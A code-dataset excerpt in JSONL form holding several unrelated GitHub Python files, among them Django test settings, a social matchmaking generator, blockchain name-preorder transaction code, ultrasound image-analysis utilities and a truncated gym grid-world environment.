self.PlotData(self.isGui)","repo_name":"Michaellevi68/neural-electrophysiology-tool-team-python","sub_path":"MCH5Interface.py","file_name":"MCH5Interface.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"33885303069","text":"import os\nfrom tempfile import gettempdir\n\nBASE_DIR = os.path.dirname(__file__)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.sessions',\n 'django.contrib.contenttypes',\n 'django.contrib.admin',\n 'cufon',\n)\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n }\n}\n\nSTATIC_ROOT = os.path.join(gettempdir(), 'cufon-test')\nSTATIC_URL = '/static/'\n\nDEBUG = True\n","repo_name":"JonnyFunFun/django-cufon","sub_path":"cufon/tests/test_django_cufon.py","file_name":"test_django_cufon.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"3111600763","text":"'''lista = [\"1 2 3 4\"]\r\nfor i in lista:\r\n a = i.split(\" \")\r\nprint(a)'''\r\n\r\ndef lector(archivoEntrada):\r\n lineas = []\r\n archivo= open(archivoEntrada)\r\n for linea in archivo.readlines():\r\n a = linea.rstrip('\\n')\r\n lineas.append(a)\r\n archivo.close()\r\n return lineas\r\n\r\ndef elevarNum(lineas):\r\n for i in lineas:\r\n listaSeparada = i.split(\" \")\r\n multiplicar = []\r\n try:\r\n n = 0\r\n u = 1\r\n for i in range(len(listaSeparada)):\r\n #print(listaSeparada[n],listaSeparada[u])\r\n #elevar = float(listaSeparada[n])**float(listaSeparada[u])\r\n elevar = int(listaSeparada[n])**int(listaSeparada[u])\r\n print(elevar)\r\n n = n+2\r\n u = u+2\r\n multiplicar.append(elevar)\r\n except IndexError:\r\n pass\r\n product = 1\r\n for i in multiplicar:\r\n product *= i\r\n print(product)\r\n \r\n\r\nif __name__ == '__main__':\r\n print('toyvolaoalo')\r\n lineas = 
lector('primos.txt')\r\n elevarNum(lineas)","repo_name":"NikoHQ/Python","sub_path":"leertxt.py","file_name":"leertxt.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"1208541439","text":"# By\n# ████████╗██╗ ██╗ █████╗ ███╗ ██╗ ██╗ ██╗ ██████╗ \n# ╚══██╔══╝██║ ██║██╔══██╗████╗ ██║ ██║ ██║██╔═══██╗\n# ██║ ██║ ██║███████║██╔██╗ ██║ ███████║██║ ██║\n# ██║ ██║ ██║██╔══██║██║╚██╗██║ ██╔══██║██║ ██║\n# ██║ ╚██████╔╝██║ ██║██║ ╚████║ ██║ ██║╚██████╔╝\n# ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═════╝ \n\n# Email: ttuan.ho@outlook.com \n\nimport re\nimport time, datetime\nfrom main_files.exceptions import InvalidTypeError\nimport pytest\n\ndef checkDBType(input, type='str', strLength=None):\n if strLength != None and (not isinstance(strLength, int)):\n raise ValueError(f\"Invalid type of {strLength}\")\n if type(input) == 'int' and str(type) == 'int':\n return True\n if type(input) == 'str' and str(type) == 'str':\n return len(input) <= strLength\n \nif __name__ == '__main__':\n with pytest.raises(InvalidTypeError, match='*'):\n checkDBType('asfds', strLength='asfsdf')\n\n\n\n","repo_name":"ttuanho/cse-hackathon-2020","sub_path":"backend/main_files/helpers/strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"41098672485","text":"from src.org.fotw.h2h.h2h_pb2 import MatchSet, Match\n\nimport random\n\n\n_MAX_GUEST_COUNT = 2\n_MIN_SINGLES_GROUP_SIZE = 3\n_MAX_SINGLES_GROUP_SIZE = 4\n\n\ndef gen_match_config(match_date, p_config):\n \"\"\"\n Returns (matches, found_match) for a given participant config.\n\n match_date is assumed to be a datetime.datetime object\n \"\"\"\n p_names = [p_name for p_name in p_config if p_config[p_name].participating]\n random.shuffle(p_names) # Shuffles in-place.\n\n match_set = MatchSet(date_yyyymmdd=match_date.strftime('%Y%m%d'))\n i = 0\n while i < len(p_names):\n first_p_name = p_names[i]\n is_hosted = p_config[first_p_name].can_host\n i += 1\n\n if i >= len(p_names):\n return None, False\n\n n_guests = -1\n if not is_hosted:\n possible_coguest_len = 0\n group_gender = p_config[first_p_name].gender_if_single\n while (\n i + possible_coguest_len < len(p_names)\n and not (\n p_config[p_names[i+possible_coguest_len]].is_family\n or p_config[p_names[i+possible_coguest_len]].gender_if_single != group_gender\n )\n ):\n possible_coguest_len += 1\n if possible_coguest_len < _MIN_SINGLES_GROUP_SIZE:\n return None, False\n n_guests = random.randint(_MIN_SINGLES_GROUP_SIZE, min(possible_coguest_len, _MAX_SINGLES_GROUP_SIZE))\n if is_hosted:\n # p_names[i] is now the first guest participant. 
Figure out how many\n # co-guests are possible.\n # Constraint: at most one family, no large families with singles..\n possible_coguest_len = 0\n has_family = False\n has_singles = False\n while (\n i + possible_coguest_len < len(p_names)\n and not (\n (has_family and p_config[p_names[i+possible_coguest_len]].is_family)\n or (has_singles and p_config[p_names[i+possible_coguest_len]].child_count >= 5)\n )\n ):\n has_family = (\n has_family or p_config[p_names[i+possible_coguest_len]].is_family)\n has_singles = (\n has_singles or (not p_config[p_names[i+possible_coguest_len]].is_family))\n possible_coguest_len += 1\n n_guests = random.randint(1, min(possible_coguest_len, _MAX_GUEST_COUNT))\n member_names = p_names[i:i+n_guests] + [first_p_name]\n i += n_guests\n\n match = match_set.match.add()\n if is_hosted:\n match.host = first_p_name\n match.member.extend(sorted(member_names))\n return match_set, True\n\n\ndef gen_sprinkler_match_config(match_date, p_config):\n \"\"\"\n Returns (matches, found_match) for a given participant config trying to\n match families with families and sprinkle singles in (and also trying\n not to overload families with 3+ additional singles).\n\n match_date is assumed to be a datetime.datetime object\n \"\"\"\n p_names = [p_name for p_name in p_config if p_config[p_name].participating]\n host_names = [p_name for p_name in p_names if p_config[p_name].can_host]\n sprinkler_names = [p_name for p_name in p_names if not p_config[p_name].can_host]\n\n random.shuffle(host_names)\n random.shuffle(sprinkler_names)\n match_set = MatchSet(date_yyyymmdd=match_date.strftime('%Y%m%d'))\n\n # Get to an even number of host_names for matching below.\n if len(host_names) % 2 == 1:\n if not sprinkler_names:\n host_names.pop() # That host just won't get to participate :(\n else:\n match = match_set.match.add()\n match.host = host_names.pop()\n match.member.extend(sorted([match.host, sprinkler_names.pop()]))\n\n if len(host_names) % 2 == 1:\n raise Exception('Impossible: host_names is not an even length!')\n\n # Make hostless singles groups so that families don't get overwhelmed\n # with 3+ singles on top of another family being hosted.\n while len(sprinkler_names) > len(host_names):\n # Make singles hostless groups\n m_singles = [x for x in sprinkler_names if p_config[x].gender_if_single == 'M']\n f_singles = [x for x in sprinkler_names if p_config[x].gender_if_single == 'F']\n other_sprinklers = [x for x in sprinkler_names if x not in m_singles and x not in f_singles]\n\n hostless_src = m_singles if len(m_singles) > len(f_singles) else f_singles\n if len(hostless_src) < _MIN_SINGLES_GROUP_SIZE:\n break # Allow overflow rather than drop singles\n\n n_singles = random.randint(_MIN_SINGLES_GROUP_SIZE, min(len(hostless_src), _MAX_SINGLES_GROUP_SIZE))\n gathering_members = []\n for i in range(n_singles):\n gathering_members.append(hostless_src.pop())\n \n match = match_set.match.add()\n match.member.extend(sorted(gathering_members))\n\n # Reconstructing it this way works because when popping from hostless_src,\n # we're also popping from the actual source list (m_singles or f_singles)\n # so sprinkler_names should shrink.\n sprinkler_names = other_sprinklers + m_singles + f_singles\n random.shuffle(sprinkler_names)\n\n # Match all the families together (since len(host_names) is even).\n for i in range(0, len(host_names), 2):\n match = match_set.match.add()\n match.host = host_names[i]\n match.member.extend(sorted([host_names[i], host_names[i+1]]))\n\n hosted_matches = [match for match in 
match_set.match if match.host]\n if hosted_matches:\n i = 0\n while sprinkler_names:\n hosted_matches[i].member.append(sprinkler_names.pop())\n i = (i + 1) % len(hosted_matches)\n\n return match_set, True\n","repo_name":"agrimball/fotw-h2h-dev","sub_path":"src/org/fotw/h2h/match_generator.py","file_name":"match_generator.py","file_ext":"py","file_size_in_byte":5341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"72201800949","text":"import cv2\nimport numpy as np\n\n# resize image\n# load the example image\nimage = cv2.imread(\"sample2.jpeg\")\ncrop_img = image[350:600, 200:450]\ncv2.imwrite('cropped.png', crop_img)\n\n# pre-process the image by resizing it, converting it to\n# graycale, blurring it, and computing an edge map\ngray = cv2.cvtColor(crop_img, cv2.COLOR_BGR2GRAY)\n# Applying Gaussian blurring with a 5×5 kernel to reduce high-frequency noise\n\nthresh1 = cv2.threshold(gray, 150, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n\nkernel1 = cv2.getStructuringElement(cv2.MORPH_RECT, (2, 2))\nthresh1 = cv2.morphologyEx(thresh1, cv2.MORPH_OPEN, kernel1)\ncv2.imshow('cropped.png', thresh1)\ncv2.waitKey(0)\n\nblurred = cv2.GaussianBlur(thresh1, (5, 5), 0)\nedged = cv2.Canny(blurred, 50, 200, 255)\n\n\n# get black box contour: \n# find contours in the edge map, then sort them by their\n# size in descending order\n\ncnts, _ = cv2.findContours(edged, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\nprint(len(cnts))\ncnts = sorted(cnts, key=lambda x: cv2.contourArea(x), reverse=True)\ndisplayCnt = cnts[0]\nprint(displayCnt.shape)\n# mask = np.zeros(crop_img.shape, dtype='uint8')\n# print(crop_img.shape)\n# cv2.drawContours(mask, cnts, -1, (255),1)\n# mask = mask[:, :, 1]\n\n# isolated = cv2.bitwise_and(crop_img, crop_img, mask=mask)\nx,y,w,h= cv2.boundingRect(displayCnt)\ncropped_img=crop_img[y:y+h, x:x+w]\ncolor = cv2.cvtColor(cropped_img, cv2.COLOR_BGR2GRAY)\n\ncv2.imwrite('gray.png', color)\n\n\n# separate digits -> ignore white hole between last 2 digits\nimg_name = \"ex2.png\"\n# do binary color transform\n# threshold the warped image, then apply a series of morphological\n# operations to cleanup the thresholded image\nthresh = cv2.threshold(color, 150, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n\nkernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (2, 2))\nthresh = cv2.morphologyEx(thresh, cv2.MORPH_OPEN, kernel)\n\ncv2.imwrite('thresh.png', thresh)\n# find contours in the thresholded image, then initialize the\n# digit contours lists\n\nmatrix = np.asarray(thresh)\nprint(matrix.shape)\nnum_rows, num_cols = matrix.shape\nblock_tuples = []\nblobs = []\nl_cnt = 0\nr_cnt = 0\n\nrow = int(num_rows / 2)\nflag = False\n# get black regions\nfor c in range(matrix.shape[1]):\n if (matrix[row, c] == 0):\n if not flag:\n l_cnt = r_cnt\n flag = not flag\n else:\n if flag:\n block_tuples.append(l_cnt)\n blobs.append(r_cnt - l_cnt)\n flag = not flag\n \n r_cnt = r_cnt + 1\n\nprint(blobs)\nprint(block_tuples)\ntop_three = sorted(zip(blobs, block_tuples), reverse=True) [:3]\nprint(top_three)\nvert_padding = 7\nhz_padding = 5\n\nfor i in range(2):\n len, idx = top_three[i]\n post_len, post_idx = top_three[i+1]\n if i == 1:\n cv2.imwrite('dig_{index}.png'.format(index = i + 1), color[vert_padding:num_rows-vert_padding, idx+len - hz_padding:post_idx-10 + hz_padding])\n else: \n cv2.imwrite('dig_{index}.png'.format(index = i + 1), color[vert_padding:num_rows-vert_padding, idx+len - hz_padding:post_idx + hz_padding])\n\nidx_3, len_3 = 
top_three[2]\ncv2.imwrite('dig_3.png', color[ vert_padding:num_rows-vert_padding, idx_3+len_3 - hz_padding:num_cols + hz_padding])\n","repo_name":"Emerald-Z/OCR-digit-recognition","sub_path":"image_processing_cv/img_prc2.py","file_name":"img_prc2.py","file_ext":"py","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"5467532489","text":"from pybitcoin import embed_data_in_blockchain, \\\n analyze_private_key, serialize_sign_and_broadcast, make_op_return_script, \\\n make_pay_to_address_script, b58check_encode, b58check_decode, BlockchainInfoClient, \\\n hex_hash160, bin_hash160, BitcoinPrivateKey\n\n\nfrom pybitcoin.transactions.outputs import calculate_change_amount\nfrom utilitybelt import is_hex\nfrom binascii import hexlify, unhexlify\n\nfrom ..b40 import b40_to_hex, is_b40\nfrom ..config import *\nfrom ..scripts import blockstore_script_to_hex, add_magic_bytes, get_script_pubkey\nfrom ..hashing import hash_name\n\n\ndef build(name, script_pubkey, register_addr, consensus_hash, testset=False):\n \"\"\"\n Takes a name, including the namespace ID (but not the id: scheme), a script_publickey to prove ownership\n of the subsequent NAME_REGISTER operation, and the current consensus hash for this block (to prove that the \n caller is not on a shorter fork).\n \n Returns a NAME_PREORDER script.\n \n Record format:\n \n 0 2 3 23 39\n |-----|--|----------------------------------------------|--------------|\n magic op hash(name.ns_id,script_pubkey,register_addr) consensus hash\n \n \"\"\"\n \n if not is_b40( name ) or \"+\" in name or name.count(\".\") > 1:\n raise Exception(\"Name '%s' has non-base-38 characters\" % name)\n \n # name itself cannot exceed LENGTHS['blockchain_id_name']\n if len(NAME_SCHEME) + len(name) > LENGTHS['blockchain_id_name']:\n raise Exception(\"Name '%s' is too long; exceeds %s bytes\" % (name, LENGTHS['blockchain_id_name'] - len(NAME_SCHEME)))\n \n name_hash = hash_name(name, script_pubkey, register_addr=register_addr)\n\n script = 'NAME_PREORDER 0x%s 0x%s' % (name_hash, consensus_hash)\n hex_script = blockstore_script_to_hex(script)\n packaged_script = add_magic_bytes(hex_script, testset=testset)\n \n return packaged_script\n\n\ndef make_outputs( data, inputs, change_addr, fee, format='bin' ):\n \"\"\"\n Make outputs for a name preorder:\n [0] OP_RETURN with the name \n [1] change address with the NAME_PREORDER sender's address\n [2] pay-to-address with the *burn address* with the fee\n \"\"\"\n \n total_to_send = DEFAULT_OP_RETURN_FEE + DEFAULT_DUST_FEE + max(fee, DEFAULT_DUST_FEE)\n \n return [\n # main output\n {\"script_hex\": make_op_return_script(data, format=format),\n \"value\": DEFAULT_OP_RETURN_FEE},\n \n # change address\n {\"script_hex\": make_pay_to_address_script(change_addr),\n \"value\": calculate_change_amount(inputs, total_to_send, (len(inputs) + 3) * DEFAULT_DUST_FEE)},\n \n # burn address\n {\"script_hex\": make_pay_to_address_script(BLOCKSTORE_BURN_ADDRESS),\n \"value\": max(fee, DEFAULT_DUST_FEE)}\n ]\n\n\ndef broadcast(name, register_addr, consensus_hash, private_key, blockchain_client, fee, testset=False):\n \"\"\"\n Builds and broadcasts a preorder transaction.\n \"\"\"\n \n script_pubkey = get_script_pubkey( private_key )\n \n nulldata = build( name, script_pubkey, register_addr, consensus_hash, testset=testset)\n \n # get inputs and from address\n private_key_obj, from_address, inputs = analyze_private_key(private_key, blockchain_client)\n \n # build custom 
outputs here\n outputs = make_outputs(nulldata, inputs, from_address, fee, format='hex')\n \n # serialize, sign, and broadcast the tx\n response = serialize_sign_and_broadcast(inputs, outputs, private_key_obj, blockchain_client)\n \n # response = {'success': True }\n response.update({'data': nulldata})\n \n return response\n\n\ndef parse(bin_payload):\n \"\"\"\n Parse a name preorder.\n NOTE: bin_payload *excludes* the leading 3 bytes (magic + op) returned by build.\n \"\"\"\n \n name_hash = hexlify( bin_payload[0:LENGTHS['preorder_name_hash']] )\n consensus_hash = hexlify( bin_payload[LENGTHS['preorder_name_hash']:] )\n \n return {\n 'opcode': 'NAME_PREORDER',\n 'preorder_name_hash': name_hash,\n 'consensus_hash': consensus_hash\n }\n","repo_name":"ben-haim/blockstore","sub_path":"blockstore/lib/operations/preorder.py","file_name":"preorder.py","file_ext":"py","file_size_in_byte":4108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"94"} +{"seq_id":"11439348527","text":"with open(r\"input\") as f:\n file = f.readlines()\n relations = {}\n for relation in file:\n orbits = relation.split(\")\")\n relations[orbits[1].rstrip()] = orbits[0]\n steps = 0\n you_to_com = []\n san_to_com = [] \n key = \"YOU\" \n while key != \"COM\":\n you_to_com.append(relations[key])\n key = relations[key]\n key = \"SAN\"\n while key != \"COM\":\n san_to_com.append(relations[key])\n key = relations[key] \n you_to_com = set(you_to_com)\n san_to_com = set(san_to_com)\n print(len(you_to_com ^ san_to_com))","repo_name":"brukidm/AoC2019","sub_path":"Day 6/6b.py","file_name":"6b.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"35892088747","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport web, json\nfrom bson.objectid import ObjectId\nfrom config import setting\nimport app_helper\n\ndb = setting.db_web\n\nurl = ('/wx/get_settings')\n\n# 获取全局参数\nclass handler: \n\tdef POST(self):\n\t\tweb.header('Content-Type', 'application/json')\n\t\tparam = web.input(openid='',session_id='')\n\n\t\tif param.openid=='' and param.session_id=='':\n\t\t\treturn json.dumps({'ret' : -2, 'msg' : '参数错误'})\n\n\t\t# 同时支持openid和session_id\n\t\tif param.openid!='':\n\t\t\tuname = app_helper.check_openid(param.openid)\n\t\telse:\n\t\t\tuname = app_helper.wx_logged(param.session_id)\n\t\tif uname:\n\t\t\tdb_shop = db.base_shop.find_one({'_id':ObjectId(setting.default_shop)},{'name':1})\n\n\t\t\t# 返回全局参数\n\t\t\treturn json.dumps({'ret' : 0, 'data' : {\n\t\t\t\t'free_delivery' : '%.2f' % app_helper.free_delivery,\n\t\t\t\t'first_promote' : '%.2f' % app_helper.first_promote,\n\t\t\t\t'cod_enable' : False,\n\t\t\t\t'image_host' : '/static/image/product',\n\t\t\t\t'image_host2' : 'http://%s/image/product' % setting.image_host,\n\t\t\t\t'banner' : app_helper.BANNER['c001'],\n\t\t\t\t'default_shop' : setting.default_shop, # 返回默认站店\n\t\t\t\t'default_name' : db_shop['name'] if db_shop else '',\n\t\t\t\t'phone_number' : uname['uname'],\n\t\t\t}})\n\t\telse:\n\t\t\treturn json.dumps({'ret' : -4, 'msg' : '无效的openid'})\n","repo_name":"jack139/fair","sub_path":"src/weixin/get_settings.py","file_name":"get_settings.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"14139000156","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport cv2 as cv\n\ndef weight_angle(angles, weights):\n '''\n 
Parameters\n ----------\n angles : numpy array of angles (or positions)\n The elements are angles corresponding to vast peak points \n weights : numpy array\n The elements are weights, i.e. gray values of vast peak points \n (used to weigh orientation and position of straight line)\n Returns\n -------\n The weighted angle\n\n '''\n return np.sum(angles*weights)/np.sum(weights)\n \ndef measure_line(theta, pos, point, image):\n '''\n Parameters\n ----------\n theta : theta_1 or theta_2, angle with the horizontal line \n pos : The weighted position of the feature\n point : The direction that the line points into (+1 or -1) \n (positive: up, negative: down (viewing from left to right))\n image : The image to plot the lines on\n Returns\n -------\n line_start: The left endpoint of the line\n line_stop: The rigth endpoint of the line\n '''\n x,y = image.shape[1], image.shape[0]\n line_start = (0, int(pos-point*0.5*x*np.tan(np.radians(theta))))\n line_stop = (x-1,int(pos+point*0.5*x*np.tan(np.radians(theta))))\n \n return line_start, line_stop\n \ndef get_reference_max(img_data, factor):\n '''\n Get the reference max for the image data for a given factor\n '''\n max_value = np.abs(img_data).max()\n reference_max = factor * max_value\n return reference_max\n\ndef get_peaks(grad, num_peaks):\n '''\n Get the indices of the peak points of a (gradient) radon transform \n for a given numper of peaks\n '''\n grad_copy = np.copy(grad)\n top_idxs_grad = []\n for i in range(num_peaks):\n index = np.unravel_index(grad_copy.argmax(), grad_copy.shape)\n grad_copy[index] = np.min(grad)-1\n index = np.array(index)\n top_idxs_grad.append(index)\n \n return np.array(top_idxs_grad)\n\ndef pre_cluster_outlier_removal(tops, theta, res_pos):\n '''\n Filter peak points from corners of the gradient radon transform\n prior to clustering. 
Inputs are the peak indices, theta and the position resolution\n '''\n to_delete = []\n for i in range(len(tops)):\n if (theta[tops[i][0]-1] < 180*0.25 and tops[i][1] - 1 < res_pos*0.25):\n to_delete.append(i)\n if (theta[tops[i][0]-1] > 180*0.75 and tops[i][1] - 1 > res_pos*0.75): \n to_delete.append(i)\n if (theta[tops[i][0]-1] < 180*0.25 and tops[i][1] - 1 > res_pos*0.75):\n to_delete.append(i)\n if (theta[tops[i][0]-1] > 180*0.75 and tops[i][1] - 1 < res_pos*0.25):\n to_delete.append(i)\n if tops[i][1] - 1 > res_pos*0.95:\n to_delete.append(i)\n return np.delete(tops,to_delete,0)\n\ndef order_labels(tops, pred):\n '''\n Reorder labels for a prediction vector such that sup-aps have label 0 (red), \n fascicles have label 1 (green) and deep-aps have label 2 (blue)\n '''\n label10 = pred[np.argsort(tops[:,1])][0]\n label12 = pred[np.argsort(tops[:,1])][-1]\n\n for i in range(len(tops[:,1])):\n if pred[i] == label10:\n pred[i] = 10\n elif pred[i] == label12:\n pred[i] = 12\n else:\n pred[i] = 11\n \n return pred - 10\n\n\ndef load_rgb(image):\n '''\n Turn an array into a grayscale image with three channels, so colored\n lines and text can be drawn on the image\n '''\n plt.imsave('temp.png',image)\n plt.close()\n img_rgb = cv.imread('temp.png')\n img_rgb = cv.cvtColor(img_rgb, cv.COLOR_BGR2GRAY)\n\n # Convert grayscale to rgb/bgr by duplicating the channels\n # This is necessary to plot colored lines on top of the image\n img_gray = []\n for i in range(len(img_rgb)):\n row = []\n for j in range(len(img_rgb[i])):\n row.append([img_rgb[i][j], img_rgb[i][j], img_rgb[i][j]])\n img_gray.append(row)\n\n return np.array(img_gray)\n\n\ndef draw_text_on_image(image, text, position, color = (0,0,255)):\n '''\n Draw text on an image, given the position (bottom left corner of text)\n '''\n cv.putText(image,\n text, \n position, # bottom left corner of text\n cv.FONT_HERSHEY_SIMPLEX, # font\n 0.5, # font scale\n color, # font color\n 1) # line type\n\n\ndef plot_results(image, theta_1, theta_2, weighted_pos_fas, point_fas, weighted_pos_deep_apo, point_deep_apo, frame_index):\n '''\n Draw the results given positions, orientations and angles of the deep aponeurosis and fascicle\n Returns an image which can then be saved\n '''\n img_rgb = load_rgb(image)\n\n # Draw the weighted fascicles and deep aponeuroses on the image\n line_start_fas, line_stop_fas = measure_line(theta_2, weighted_pos_fas, point_fas, img_rgb)\n line_start_deep, line_stop_deep = measure_line(theta_1, weighted_pos_deep_apo, point_deep_apo, img_rgb)\n\n cv.line(img_rgb,line_start_fas,line_stop_fas,(0,255,0),2) # green\n cv.line(img_rgb,line_start_deep,line_stop_deep,(255,0,0),2) # blue\n\n draw_text_on_image(img_rgb, 'Pennation angle: %.2f' % (theta_1 + theta_2), (10,50))\n draw_text_on_image(img_rgb, 'Frame index: ' + str(frame_index), (10,20))\n \n return img_rgb\n\ndef plot_double_results(image, theta_1, theta_2, penn_ANN, weighted_pos_fas, point_fas, weighted_pos_deep_apo, point_deep_apo, frame_index):\n '''\n Draw the results given positions, orientations and angles of the deep aponeurosis and fascicle from ALT\n and pennation angle from ANN\n Returns an image which can then be saved\n '''\n img_rgb = load_rgb(image)\n\n # Draw the weighted fascicles and deep aponeuroses on the image\n line_start_fas, line_stop_fas = measure_line(theta_2, weighted_pos_fas, point_fas, img_rgb)\n line_start_deep, line_stop_deep = measure_line(theta_1, weighted_pos_deep_apo, point_deep_apo, img_rgb)\n\n line_start_fas_ann, line_stop_fas_ann = 
measure_line(penn_ANN - theta_1, weighted_pos_fas, point_fas, img_rgb)\n\n cv.line(img_rgb,line_start_fas,line_stop_fas,(0,255,0),2) # green\n cv.line(img_rgb,line_start_deep,line_stop_deep,(255,0,0),2) # blue\n \n cv.line(img_rgb,line_start_fas_ann,line_stop_fas_ann,(0,0,255),2) # red\n\n cv.rectangle(img_rgb, (5,5), (220,100), (0,0,0), -1)\n draw_text_on_image(img_rgb, 'Penn. angle (ALT): %.2f' % (theta_1 + theta_2), (10,50), (0,255,0)) \n draw_text_on_image(img_rgb, 'Penn. angle (ML): %.2f' % penn_ANN, (10,80), (0,0,255)) \n draw_text_on_image(img_rgb, 'Frame index: ' + str(frame_index), (10,20), (200,200,200))\n \n return img_rgb\n\n\ndef filter_canny_aponeuroses(ang, pos, weights):\n '''\n Filter aponeuroses that \n 1. Are greater than 15 degrees\n 2. Point in the opposite direction than the majority\n 3. Are at the edge of the image\n 4. Are positioned very far from the average position\n Used where aponeuroses are detected with canny edge detection\n '''\n\n to_delete = [] \n\n for i in range(len(pos)):\n if np.abs(ang[i] - 90) > 15:\n to_delete.append(i) \n \n ang = np.delete(ang,to_delete,0)\n pos = np.delete(pos,to_delete,0)\n weights = np.delete(weights,to_delete,0)\n \n to_delete = [] \n vote1 = 0\n vote2 = 0\n for i in range(len(ang)):\n if ang[i] > 90:\n vote1+=1\n if ang[i] < 90: # No vote if exactly 90\n vote2 += 1\n \n if vote1>vote2:\n for i in range(len(ang)):\n if ang[i] < 90:\n to_delete.append(i)\n else:\n for i in range(len(ang)):\n if ang[i]> 90:\n to_delete.append(i)\n \n ang = np.delete(ang,to_delete,0)\n pos = np.delete(pos,to_delete,0)\n weights = np.delete(weights,to_delete,0)\n \n '''\n print(ang)\n print(pos)\n to_delete = [] \n for i in range(len(pos)):\n if pos[i] < 5:\n to_delete.append(i) \n \n ang = np.delete(ang,to_delete,0)\n pos = np.delete(pos,to_delete,0)\n weights = np.delete(weights,to_delete,0)\n \n print(ang)\n print(pos)\n to_delete = [] \n mean_pos = np.mean(pos)\n \n for i in range(len(pos)):\n if np.abs(pos[i] - mean_pos) > 40:\n to_delete.append(i) \n \n ang = np.delete(ang,to_delete,0)\n pos = np.delete(pos,to_delete,0)\n weights = np.delete(weights,to_delete,0)\n print(ang)\n print(pos)\n \n '''\n return ang, pos, weights\n\n\n\n\n\n \n","repo_name":"soleym/ml-muscle-feature-extraction","sub_path":"utils/image_labeling.py","file_name":"image_labeling.py","file_ext":"py","file_size_in_byte":8571,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"18680589025","text":"import gym\nimport gym.spaces\nimport numpy as np\nimport sys\nfrom six import StringIO, b\n\nfrom gym import utils\n\n# actions for the players\nLEFT = 0\nDOWN = 1\nRIGHT = 2\nUP = 3\nSTAY = 4\n\nMAPS = {\n \"4x4\": [\n \"S \",\n \" H H\",\n \" H\",\n \"H G\"\n ],\n \"4x4_easy\": [\n \"S \",\n \" \",\n \" H \",\n \" G\"\n ],\n \"3x4\": [\n \" HG \",\n \"S \",\n \" \"\n ],\n \"8x8\": [\n \"SFFFFFFF\",\n \"FFFFFFFF\",\n \"FFFHFFFF\",\n \"FFFFFHFF\",\n \"FFFHFFFF\",\n \"FHHFFFHF\",\n \"FHFFHFHF\",\n \"FFFHFFFG\"\n ],\n}\n\n\nclass Grid(gym.Env):\n \"\"\"\n The world is like:\n\n S___\n _H_H\n ___H\n H__G\n\n S : starting point, safe\n _ : safe surface\n H : hole, fall to your doom\n G : goal, yay!\n\n The episode ends when you reach the goal or fall in a hole.\n You receive a reward of 1 if you reach the goal, -1 if fall in a hole .\n\n \"\"\"\n\n metadata = {'render.modes': ['human', 'ansi']}\n\n # coordinate system is matrix-based (e.g. 
down increases the row)\n action_effects = {\n LEFT: (0, -1),\n DOWN: (+1, 0),\n RIGHT: (0, +1),\n UP: (-1, 0),\n STAY: (0, 0)\n }\n\n action_names = {\n LEFT: \"<\", DOWN: \"v\",\n RIGHT: \">\", UP: \"^\",\n STAY: \"x\",\n }\n\n # rewards from the agent's point of view\n rewards = {\n 'G': 1,\n 'H': -1,\n 'S': 0,\n ' ': 0\n }\n\n def __init__(self, desc=None, map_name=\"3x4\"):\n\n if desc is None and map_name is None:\n raise ValueError('Must provide either desc or map_name')\n elif desc is None:\n desc = MAPS[map_name]\n self.world = desc\n\n # desc has the 'world' as an array\n self.desc = desc = np.asarray(desc, dtype='c')\n self.nrows, self.ncols = nrows, ncols = desc.shape\n\n # initial state (the coords of S)\n self.current_state = self.initial_state()\n\n self.number_actions = len(self.action_effects) # number of actions\n self.number_states = nrows * ncols # number of states\n\n self.action_space = gym.spaces.Discrete(self.number_actions)\n self.observation_space = gym.spaces.Discrete(self.number_states)\n\n def initial_state(self):\n \"\"\"\n Returns the initial state of this environment\n :return:\n \"\"\"\n for row_num, row in enumerate(self.world):\n for col_num, col in enumerate(row):\n if col == 'S':\n return row_num, col_num\n\n def safe_exec(self, origin, a):\n \"\"\"\n Simulates the execution of an action,\n preventing out of bounds\n :param origin: tuple(row, col)\n :param a:the action (an integer)\n :return:\n \"\"\"\n row, col = origin\n # action effects are deterministic\n action_effect = self.action_effects[a]\n new_row, new_col = row + action_effect[0], col + action_effect[1]\n\n # ensures new coordinates are within boundaries\n new_row = min(self.nrows - 1, max(0, new_row))\n new_col = min(self.ncols - 1, max(0, new_col))\n\n return new_row, new_col\n\n def print_deterministic_policy(self, policy, outstream=sys.stdout, action_names=None):\n \"\"\"\n Prints a deterministic policy in the grid world\n :param policy: dict(observation -> action)\n :param outstream: the output stream to print into\n :param action_names: list with the char to appear on screen for each action index,\n defaults to self.action_names if not informed\n :return:\n \"\"\"\n # alias\n names = self.action_names if action_names is None else action_names\n\n # the 'world' where cells are replaced with the action described by the policy\n desc = self.desc.tolist()\n desc = [[names[policy[(r, c)]] for c, _ in enumerate(line)] for r, line in enumerate(desc)]\n\n outstream.write(\"_\" 